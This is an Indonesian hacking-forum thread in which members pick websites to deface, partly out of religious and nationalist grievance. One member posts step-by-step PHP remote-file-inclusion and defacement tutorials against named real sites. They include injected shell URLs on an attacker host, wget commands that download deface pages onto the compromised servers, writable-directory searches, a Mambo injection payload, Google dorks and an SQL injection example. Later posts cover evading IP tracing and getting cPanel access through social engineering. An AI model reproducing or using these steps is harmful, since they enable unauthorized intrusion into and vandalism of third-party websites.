Sasaran Web Buat di Hack
+11
cute_hacker
xizr
haig_mobilkom
Akmal_f
Baby Ice
putu-yoga
jack1988
elmotan
Lord Mist
ro_sso_neri
Dashin
15 posters
Halaman 1 dari 3
Halaman 1 dari 3 • 1, 2, 3
Sasaran Web Buat di Hack
Ini adalah daftar2 website yang patut dihack
Ini salah satu contohnya
*EDITED. REASON: TOO MUCH RISK---- OTHER MEMBERS MIGHT SEE ~ LORD MIST.
Alasannya menjelek-jelekkan nama Islam, mo tau buktinya silakan liat sendiri
Klo merasa thread kaya gini gak boleh silakan aja didelet oleh para mod ok
Ini salah satu contohnya
*EDITED. REASON: TOO MUCH RISK---- OTHER MEMBERS MIGHT SEE ~ LORD MIST.
Alasannya menjelek-jelekkan nama Islam, mo tau buktinya silakan liat sendiri
Klo merasa thread kaya gini gak boleh silakan aja didelet oleh para mod ok
Re: Sasaran Web Buat di Hack
Gpp koq, sekalian sama caranyaDashin wrote:Ini adalah daftar2 website yang patut dihack
Ini salah satu contohnya
http://www.indonesia.faithfreedom.org/forum/index.php
Alasannya menjelek-jelekkan nama Islam, mo tau buktinya silakan liat sendiri
Klo merasa thread kaya gini gak boleh silakan aja didelet oleh para mod ok
Inget "Hack Just For Fun"
ro_sso_neri- Admin
-
Jumlah posting : 211
Age : 30
Lokasi : Searching.....
Pekerjaan : Searching.....
Reputasi : 0
Registration date : 13.09.07
Re: Sasaran Web Buat di Hack
OOh yeah bisa juga klo berhasil ngehack disini bisa dijelasin proses ngehacknya gimana
Re: Sasaran Web Buat di Hack
DEFACE mau kagak????
Ane jelasin prosedurnya...
1. Scan IP Target
2. Pelajari [i]Security Hole[/i[ lalu sisipkan program delphi yang sebelumnya anda buat.
3. Segera, situs demikian akan segera ter-redirect (secara content) ke content yang anda buat.
Contoh:
Disini kamu mesti usaha sendiri mencari targetnya.(website bisa diganti)
Thanks kepada SiKabayan untuk ngajarin ane ini.... ^^
Harap berhati hati since beberapa site punya trackback IP
Hasil:
Selamat defacing......... please jangan gunain buat ni forum ^^
Ane jelasin prosedurnya...
1. Scan IP Target
2. Pelajari [i]Security Hole[/i[ lalu sisipkan program delphi yang sebelumnya anda buat.
3. Segera, situs demikian akan segera ter-redirect (secara content) ke content yang anda buat.
Contoh:
Disini kamu mesti usaha sendiri mencari targetnya.(website bisa diganti)
- Code:
Langkah-langkah nya (untuk PHP) :
1. http://www.hilger-it.de/index.php?go=main.php
2. Kemudian hapus/delete main.php di url/browsing sehingga menjadi http://www.hilger-it.de/index.php?go=
3. Masukkan file inject ini di belakang situs tadi :
http://k.domaindlx.com/batamhacker/sql2.htm
Misal nya http://www.hilger-it.de/index.php?go...crew/sql2.htm?
4. Maka yang keluar di situs target adalah : /homepages/39/d143393561/htdocs/hilger
5. Masukkan file deface ini : http://k.domaindlx.com/batamhackercrew/jh.htm
6. Di kolom Execute Command ketik :
wget http://k.domaindlx.com/batamhackercrew/jh.htm
7. Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya: http://www.hilger-it.de/jh.htm
Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing.
Catalog PHP
1. http://www.rascom.at/catalog/product...be164a40e92dc8 atau http://www.rascom.at/catalog/default.php?cPath=2
2. Kemudian hapus/delete product_info.php?products_id=322&PHPSESSID=a7d2068 8baf4b05261be164a40e92dc8 di url/browsing sehingga menjadi http://www.rascom.at/catalog/
3. Masukkan bug ini di belakang situs tadi :
includes/include_once.php?include_file=
Misal nya http://www.rascom.at/catalog/include...?include_file=
4. Masukkan file inject ini di belakang nya lagi :
http://k.domaindlx.com/batamhackercrew/sql.htm
Misal nya http://www.rascom.at/catalog/include...rcrew/sql.htm?
5. Di kolom cmd ketik :
find / -perm 777 -type d atau find / -perm 755 -type d
Tunggu beberapa saat.......
6. Kalo foldernya Permision Denied berarti kita tidak bisa apa2 di folder itu. Cari folder yg tidak ada tulisan Permision Denied.
Contoh Permision Denied :
find: /usr/share/ssl/CA: Keine Berechtigung
find: /var/empty/sshd: Keine Berechtigung
find: /var/spool/cups: Keine Berechtigung
Kita cari yg lain tapi usahakan foldernya yg /var/www/ kalo tidak ada juga tidak apa2.
Contoh folder yg bisa : /var/www/html/www.rascom.at/catalog/images
7. Masukkan file deface ini :
http://k.domaindlx.com/batamhackercrew/jh.htm
8. Di kolom cmd ketik :
cd /var/www/html/www.rascom.at/catalog/images;wget http://k.domaindlx.com/batamhackercrew/jh.htm
Tunggu beberapa saat.......
10:35:02 (4 KB/s) - `jh.htm' saved
Itu artinya sukses ke save
9. Cara lihat hasil nya :
http://www.rascom.at/catalog/images/[file deface tadi]
10. Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya : http://www.rascom.at/catalog/images/jh.htm
Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing.
cPath
1. http://www.new2u.us/index.php?cPath0
2. Kemudian hapus/delete index.php?cPath0 di url/browsing sehingga menjadi http://www.new2u.us
3. Masukkan bug ini di belakang situs tadi :
_admin_/file_manager.php atau admin/file_manager.php
Misal nya http://www.new2u.us/_admin_/file_manager.php
4. Skrg kamu udah masuk ke file server nya. Carilah file index.php trus klik file index.php tersebut.
5. Kemudian klik tab "Edit" di kolom yg sebelah kanan.
Hapus script yg ada di kolom tsb trus ketik Hacked by *nama anda*
Trus klik tab "Save".
6. Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya : http://www.new2u.us
Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing.
Deface situs Mambo
1. http://sukan.upm.edu.my/Buletin/inde...id=17&Itemid=2
2. Kemudian hapus/delete option=com_content&task=view&id=17&Itemid=2 di url/browsing sehingga menjadi http://sukan.upm.edu.my/Buletin/index.php?
3. Masukkan bug ini di belakang situs tadi :
_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
Misal nya http://sukan.upm.edu.my/Buletin/inde...UEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
4. Masukkan file inject ini di belakang nya lagi :
http://k.domaindlx.com/batamhackercrew/sql2.htm
Misal nya : http://sukan.upm.edu.my/Buletin/inde...UEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://k.domaindlx.com/batamhackercrew/sql2.htm?
5. Di kolom Execute Command ketik :
find / -perm 777 -type d atau find / -perm 755 -type d
Tunggu beberapa saat.......
6. Kalo foldernya Permision Denied berarti kita tidak bisa apa2 di folder itu. Cari folder yg tidak ada tulisan Permision Denied.
Contoh Permision Denied :
find: /var/tux: Permission denied
find: /var/gdm: Permission denied
find: /tmp/ssh-XXcnJoE9: Permission denied
find: /tmp/orbit-root: Permission denied
Kita cari yg lain tapi usahakan foldernya yg /var/www/ kalo tidak ada juga tidak apa2.
Contoh folder yg bisa : /opt/orion
7. Masukkan file deface ini :
http://k.domaindlx.com/batamhackercrew/jh.htm
8. Di kolom Execute Command ketik :
cd /opt/orion;wget http://k.domaindlx.com/batamhackercrew/jh.htm
Tunggu beberapa saat.......
10:35:02 (4 KB/s) - `jh.htm' saved
Itu artinya sukses ke save
9. Cara lihat hasil nya :
http://sukan.upm.edu.my/Buletin/opt/orion/[file deface tadi]
10. Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya : http://sukan.upm.edu.my/Buletin/opt/orion/jh.htm
Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing.
Bug yang paling baru ada disini
ini bug yg baru
Weblogicnet
google dork : inurl:es_offer.php?files_dir=
exploit : http://somehost/path_to_Weblogicnet/...php?files_dir=[evilCode]
http://somehost/path_to_Weblogicnet/...php?files_dir=[evilCode]
http://somehost/path_to_Weblogicnet/...php?files_dir=[evilCode]
Yvora CMS v1.0
POC;
http://www.victim.xxx/error_view.php?ID=[SQL]
Contoh;
http://www.victim.xxx/error_view.php...+admin_users/*
Hasil;
Error: Username
Query: Password
Thanks kepada SiKabayan untuk ngajarin ane ini.... ^^
Harap berhati hati since beberapa site punya trackback IP
Hasil:
Selamat defacing......... please jangan gunain buat ni forum ^^
Lord Mist- Siswa Junior
-
Jumlah posting : 367
Age : 32
Lokasi : 1 & 0 City
Pekerjaan : Cracker Menuju Taubat
Reputasi : 0
Registration date : 28.09.07
Re: Sasaran Web Buat di Hack
Tenang aja, waah kumplit banget
Klo pake program buat ganti IP ntu masih bisa di trackback nggak ?
Mist klo website parawisata Malaysia udah bisa dihack nggak ?
Klo pake program buat ganti IP ntu masih bisa di trackback nggak ?
Mist klo website parawisata Malaysia udah bisa dihack nggak ?
Re: Sasaran Web Buat di Hack
Ada Trackback IP nya bro.... bisi bisi ntar ane kena cuz' ni koneksi pribadi...
Website tu silahkan pake diatas...... :((..... HADJAR MALAYSIA....
Website tu silahkan pake diatas...... :((..... HADJAR MALAYSIA....
Lord Mist- Siswa Junior
-
Jumlah posting : 367
Age : 32
Lokasi : 1 & 0 City
Pekerjaan : Cracker Menuju Taubat
Reputasi : 0
Registration date : 28.09.07
Re: Sasaran Web Buat di Hack
****** web diatas.....
Rempuk bos...
Rempuk bos...
Lord Mist- Siswa Junior
-
Jumlah posting : 367
Age : 32
Lokasi : 1 & 0 City
Pekerjaan : Cracker Menuju Taubat
Reputasi : 0
Registration date : 28.09.07
Re: Sasaran Web Buat di Hack
Dashin wrote:Lord Mist wrote:****** web diatas.....
Rempuk bos...
Kita serbu mereka
Udah di deface???
Ntu FORUM BENER BENER
Lord Mist- Siswa Junior
-
Jumlah posting : 367
Age : 32
Lokasi : 1 & 0 City
Pekerjaan : Cracker Menuju Taubat
Reputasi : 0
Registration date : 28.09.07
Re: Sasaran Web Buat di Hack
cara yang Lord Mist kasih itu buat ngedeface site php dengan php injections.
sekarang mah udah banyak patch na..
kalo pun kagak di patch, n tuch site kena deface.
sang admin bisa ngembaliin tuch site seperti semula dalam waktu kurang dari 30 detik dari Cpanel dengan system recovery console backup na.
kalo admin na jarang OL, yah mungkin tahan lah seminggu dua minggu.
tapi kalo admin na pas lagi seneng2 na OL 'n lagi seneng2 na ngotak-ngatik tuch Cpanel....??? tape dech...
sekarang mah udah banyak patch na..
kalo pun kagak di patch, n tuch site kena deface.
sang admin bisa ngembaliin tuch site seperti semula dalam waktu kurang dari 30 detik dari Cpanel dengan system recovery console backup na.
kalo admin na jarang OL, yah mungkin tahan lah seminggu dua minggu.
tapi kalo admin na pas lagi seneng2 na OL 'n lagi seneng2 na ngotak-ngatik tuch Cpanel....??? tape dech...
Re: Sasaran Web Buat di Hack
jack1988 wrote:cara yang Lord Mist kasih itu buat ngedeface site php dengan php injections.
sekarang mah udah banyak patch na..
kalo pun kagak di patch, n tuch site kena deface.
sang admin bisa ngembaliin tuch site seperti semula dalam waktu kurang dari 30 detik dari Cpanel dengan system recovery console backup na.
kalo admin na jarang OL, yah mungkin tahan lah seminggu dua minggu.
tapi kalo admin na pas lagi seneng2 na OL 'n lagi seneng2 na ngotak-ngatik tuch Cpanel....??? tape dech...
Bener juga sih ....
Tapi ane kagak tau cara lain...
Itu juga yang diatas belajarnya lama...
Woi.... :).... maksudnya disini bukan forumotion... ni domain lain kok.
Situs yang menghina agama... kudu di deface
Lord Mist- Siswa Junior
-
Jumlah posting : 367
Age : 32
Lokasi : 1 & 0 City
Pekerjaan : Cracker Menuju Taubat
Reputasi : 0
Registration date : 28.09.07
Re: Sasaran Web Buat di Hack
jack1988 wrote:cara yang Lord Mist kasih itu buat ngedeface site php dengan php injections.
sekarang mah udah banyak patch na..
kalo pun kagak di patch, n tuch site kena deface.
sang admin bisa ngembaliin tuch site seperti semula dalam waktu kurang dari 30 detik dari Cpanel dengan system recovery console backup na.
kalo admin na jarang OL, yah mungkin tahan lah seminggu dua minggu.
tapi kalo admin na pas lagi seneng2 na OL 'n lagi seneng2 na ngotak-ngatik tuch Cpanel....??? tape dech...
Trus cara apa yang lebih mantap dari deface ?
Re: Sasaran Web Buat di Hack
kalo mau total dapet akses web, ya harus langsung ke Cpanel.. carana banyak, yang paling sering di gunakan adalah metode social enginering, cuz kalo crack password dengan brute pun akan makan waktu yang lama banget. ato kalo web directory gak di patch, bisa pake exploit dasar yang contoh na ada di post reply na Lord Mist di topik referensi hacker. di sana bisa nyari file database web (*.cgi). ato kalo site na di patch dengan patcher2 yang lama (udah dulu-dulu).. bisa dengan memanfaatkan pesan error dari directory yang di patch untuk membobol MySQL server.. tapi disarankan pakai annonymous proxy server, meskipun udah banyak script bwat nampilin query real IP address, paling gak ngurangin resiko, sukur kalo telaten pake metode jumping.
NB: hanya sekedar info, tolong jangan bertanya cara melakukan ntu ke gue, okey!
NB: hanya sekedar info, tolong jangan bertanya cara melakukan ntu ke gue, okey!
Re: Sasaran Web Buat di Hack
Terus kenapa dijawab ? hahahahaha
Tenang aja lagian gwa bukan hacker atau cracker, cuma orang yang pengen tau doang.
Tenang aja lagian gwa bukan hacker atau cracker, cuma orang yang pengen tau doang.
Re: Sasaran Web Buat di Hack
- Code:
http://profiles.friendster.com/11202991
Re: Sasaran Web Buat di Hack
Admin kita memang sakti...
Hdup PUTU
Hdup PUTU
Lord Mist- Siswa Junior
-
Jumlah posting : 367
Age : 32
Lokasi : 1 & 0 City
Pekerjaan : Cracker Menuju Taubat
Reputasi : 0
Registration date : 28.09.07
Re: Sasaran Web Buat di Hack
putu-yoga wrote:sakti opone ?Lord Mist wrote:Admin kita memang sakti...
Hdup PUTU
Sakti Mandraguna tur Longjinawi hehehe
Re: Sasaran Web Buat di Hack
putu-yoga wrote:hacker itu intinya yg baik
kalau cracker itu intinya yang jahat
jadi menurut om admin, yang dilakuin itu nge-hack ato nge-crack?
Re: Sasaran Web Buat di Hack
ngecrackjack1988 wrote:putu-yoga wrote:hacker itu intinya yg baik
kalau cracker itu intinya yang jahat
jadi menurut om admin, yang dilakuin itu nge-hack ato nge-crack?
Re: Sasaran Web Buat di Hack
mohon tidak memuat tutorial yang berbau melanggar hukum
baca GENERAL RULES dari forumotion
jika forum kamu nggak ingin di delet
baca GENERAL RULES dari forumotion
- Code:
http://help.forumotion.com/Rules-important-points-f10/The-Forum-s-general-rules-t154.htm
jika forum kamu nggak ingin di delet
Baby Ice- Siswa Baru
-
Jumlah posting : 19
Age : 33
Lokasi : In Ur Eyes
Reputasi : 0
Registration date : 08.10.07
Re: Sasaran Web Buat di Hack
PM mas Putu dulu deeh soal2 itu. Soalnya yang memutuskan sgala sesuatu yang melibatkan soal web itu cuma 2 orang Putu Yoga dan Rayden. Mungkin Rosso juga bisa dicalling lewat PM
Re: Sasaran Web Buat di Hack
Dia Itu Moderator Forumotion lochDashin wrote:PM mas Putu dulu deeh soal2 itu. Soalnya yang memutuskan sgala sesuatu yang melibatkan soal web itu cuma 2 orang Putu Yoga dan Rayden. Mungkin Rosso juga bisa dicalling lewat PM
Halaman 1 dari 3 • 1, 2, 3
Similar topics
» buat virus
» belajar buat vaksin
» Sharing Software
» INFO buat semua
» Program buat ngekrek software :)
» belajar buat vaksin
» Sharing Software
» INFO buat semua
» Program buat ngekrek software :)
Halaman 1 dari 3
Permissions in this forum:
Anda tidak dapat menjawab topik